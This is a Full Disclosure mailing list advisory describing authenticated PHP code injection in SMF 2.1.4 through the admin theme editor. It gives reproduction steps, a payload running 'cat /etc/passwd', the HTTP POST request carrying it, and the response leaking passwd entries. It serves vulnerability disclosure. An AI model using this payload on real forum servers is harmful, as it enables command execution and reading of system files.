Message-ID: <CAF2Wu1YzA-Zvp+BbNxyAN=vVQn1TAj0H4eOd_MrVrc-a+h=oyQ@mail.gmail.com>
Date: Sun, 11 Aug 2024 21:13:11 +0000
From: Andrey Stoykov <mwebsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Authenticated Code Injection - smfv2.1.4

# Exploit Title:  Authenticated Code Injection - smfv2.1.4
# Date: 8/2024
# Exploit Author: Andrey Stoykov
# Version: 2.1.4
# Tested on: Ubuntu 22.04
# Blog:
https://msecureltd.blogspot.com/2024/06/friday-fun-pentest-series-7-smfv214.html

Code Injection Authenticated:

Steps to Reproduce:

1. Login as admin
2. Browse to "Current Theme"
3. Click on "Modify Themes" > "SMF Default Theme"
4. Click on Admin.template.php
5. In the first box enter the PHP payload "<?php system('cat /etc/passwd')
?>"


// HTTP POST request showing the code injection payload

POST /SMFdbwci7dy0o/index.php?action=admin;area=theme;th=1;sa=edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
[...]

entire_file[]=<?php+system('cat /etc/passwd') ?>[...]


// HTTP response showing /etc/passwd contents

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
[...]

[...]
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
[...]
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists